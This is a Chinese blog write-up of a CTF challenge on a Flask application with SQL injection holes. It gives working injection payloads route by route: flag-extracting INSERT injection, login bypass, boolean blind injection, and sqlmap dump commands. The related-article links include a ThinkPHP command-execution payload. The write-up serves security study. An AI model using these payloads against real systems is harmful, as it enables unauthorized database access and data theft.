Web_python_flask_sql_injection(攻防世界web)

最新推荐文章于 2022-01-10 17:19:18 发布
最新推荐文章于 2022-01-10 17:19:18 发布
阅读量1k 收藏 1
点赞数
分类专栏: 攻防世界(web)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/107494085
版权

目录


主要功能就是登陆注册,修改个人信息,能留言 然后可以关注别人
下载附件审计,先看路由 route.py

/index路由

不存在过滤 关键是结果直接回显
在这里插入图片描述

追踪到Others.py的Add函数
在这里插入图片描述

a','1','2020-7-20'),(Null,(select database()),'1','2020-7-20')#

在这里插入图片描述

最终Payload: a','1','2020-7-20'),(Null,(select flag from flag),'1','2020-7-20')#

/login路由

在这里插入图片描述在这里插入图片描述

到One函数之后,最后到Sel函数
在这里插入图片描述
在这里插入图片描述

无法登录
在这里插入图片描述

用万能密码直接登录之前创建的第一个用户
在这里插入图片描述

然后我新创建的用户反正除了这个admin1 都可以随便输一个密码就能登录了。。。。
这里应该也有一个盲注(数据库名是之前别的位置注入出来的)

admin1' or 1=(select database() = 'flask')# (这个用户名要是刚才试过万能密码的那个,别的用户名不过表达式对错都会成功登录)
在这里插入图片描述
在这里插入图片描述

成功登录了,也就是说等式成立
Payload: admin1' or 1=(paylaod)#

/register路由

在这里插入图片描述

追踪到forms.py,可以看到username这里有过滤,但email并没有
在这里插入图片描述

追踪到Others.py
在这里插入图片描述
在这里插入图片描述

在页面测试,可以进行盲注,如果正确就会回显Please use a different email address.
在这里插入图片描述在这里插入图片描述

这里的邮箱需要之前已经注册过的

可以写脚本也可以用sqlmap跑
在这里插入图片描述

这里因为在payload处加了前缀后缀,为了邮箱正确就把email处参数值清空了

sqlmap.py -r test.txt -p email --prefix "123'" --suffix "#@qq.com" --dbms mysql 5.0 --dbs  -v 4 --tamper=space2comment -csrf-token="csrf_token"

在这里插入图片描述

sqlmap.py -r test.txt -p email --prefix "123'" --suffix "#@qq.com" --dbms mysql 5.0 -D flask -T flag -C "flag" --dump  -v 4 --tamper=space2comment -csrf-token="csrf_token"

在这里插入图片描述

/edit_profile路由

在这里插入图片描述

再到forms.py
在这里插入图片描述在这里插入图片描述

note(页面上的About me)这里的过滤相对来说不严,有可乘之机

再看更新数据时用到的Mod函数
在这里插入图片描述

Sql语句基本就是update user set username=’admin’,note=’hello’ where id=1 这个样子
在这里插入图片描述

update user set username=’admin’,note=1' and (select 1=1 ) and '1'='1where id=1

在这里插入图片描述

1' and (select 1=1 ) and '1'='1的结果
在这里插入图片描述

1' and (select 1=2 ) and '1'='1的结果
在这里插入图片描述

也就是可以利用这个进行布尔盲注

参考https://www.guildhab.top/?p=2073

Arnoldqqq
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 988
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
a-master (1).zip_Python 管理平台_flask_python flask_python 管理_python
09-21
基于python flask的奖项管理平台
pythonsql注入_Python中防止sql注入的方法详解
weixin_39834678的博客
11-30 411
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。下面这篇文章主要给大家介绍了关于Python中防止sql注入的方法,需要的朋友可以参考下。前言大家应该都知道现在web漏洞之首莫过于sql了,不管使用哪种语言进行web后端开发,只要使用了关系型数据库,可能都会遇到sql注入攻击问题。那么在Pyt...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1308
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
攻防世界 WEB Web_python_flask_sql_injection
qq_41696858的博客
12-13 836
没啥好说的,题目已经把几个关键点给出来了,flasksql注入,还给了源码 那么就是源码审计,这题sql注入的点属实是有点多,普通的也有,难的也有,也难怪他是个九分题 干就完了,下载源码,第一个注入点是routes.py里面的index路由项 res = mysql.Add("post", ['NULL', "'%s'" % form.post.data, "'%s'" % current_user.id, "'%s'" % now()])
攻防世界--Web_python_flask_sql_injection
qq_46263951的博客
01-10 214
一开始看题目还以为是一道Flask+SQL的题,这里出现的漏洞点都是在SQL 代码审计: 路由执行代码都在routes.py,自定义函数在others.py add:插入 del:删除 mod:更新 sel:查询 /index路由: 发现没有任何过滤,插入第一条语句用来闭合,第二条执行注入 a','1','2022-1-1'),(Null,(select database()),'1','2022-1-1')# ...
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6602
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
python web开发-flask中使用sqlalchemy
挨踢学霸
03-28 4481
SqlAlchemy是一个python的ORM框架。在flask中有一个flask-sqlalchemy的扩展,使用起来很方便。1.       创建一个sqlalchemy的Model模块创建一个models.py的模块创建model的时候,首先引入flask-sqlalchemy的扩展from flask import Flaskfrom flask_sqlalchemy import SQL...
api.rar_API_IML语言_orwxh_python flask
09-23
语言为python,使用flask框架,一个简单的api示例
FLASK_BUILDING_PYTHON_WEB_SERVICES
01-30
Unleash the full potential of the Flask web framework by creating small to large and powerful web applications.
douban_flask_pythonflask豆瓣_python_
10-02
PYTHON 获得豆瓣电影榜单TOP250 爬虫升级版本
Web_python_template_injection攻防世界ctf web
weixin_45689999的博客
03-03 1307
Web_python_template_injection flask是使用Jinja2来作为渲染引擎的。看例子 在网站的根目录下新建templates文件夹,这里是用来存放html文件。也就是模板文件。 看到template injection可以猜到是SSTI(Server-Side Template Injection) 服务端模板注入 {{}}在Jinja2中作为变量包裹标识符,所以在{{...
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
热门推荐
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
攻防世界Web_python_template_injection
qq_42728977的博客
01-11 277
之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 题目 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在题目的URL后面添加如下命令,就可以命令执行了...
CTF-web 第七部分 flask模板注入 沙箱逃逸
iamsongyu的博客
10-17 8714
1 注入原理 Flaskpython语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架具体详见http://docs.jinkan.org/docs/flask/  对于Flask 框架本身,本文不做讨论。   我们看一下测试代码中的 hello_ssti函数 【功能 打印 hello + 用户传入的name值】 函数中模板内容  template = ''...
从零开始搭建python flask+vue 小型web项目以及flask_sqlalchemy访问数据库
weixin_44738632的博客
08-22 8237
重零开始搭建python flask+vue 小型web项目以及flask_sqlalchemy访问数据库 前言 作者是一个前端开发者,之前从未接触过python,也没接触过后端开发,所有这篇文章中有很多以前端的角度对python flask的理解,好了话不多说,开始搭建网站吧   开始 创建项目目录 flaskdemo ——flask # 存放后端文件 ——flask-di...
python Web安全之防止SQL注入
Fantasy_worm的博客
01-03 3715
伴随着Web2.0、社交网络、微博等一系列新型互联网产品的兴起,基于Web环境的互联网应用越来越广泛,Web攻击的手段也越来越多样,Web安全史上的一个重要里程碑是大约1999年发现的SQL注入攻击,之后的XSS,CSRF等攻击手段愈发强大,Web攻击的思路也从服务端转向了客户端,转向了浏览器和用户。 在安全领域,一般用帽子的颜色来比喻黑客的善与恶,白帽子是指那些工作在反黑客领域的技术专家,这个...
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6597
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
web python template injection_攻防世界-Web_python_template_injection详解
最新发布
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值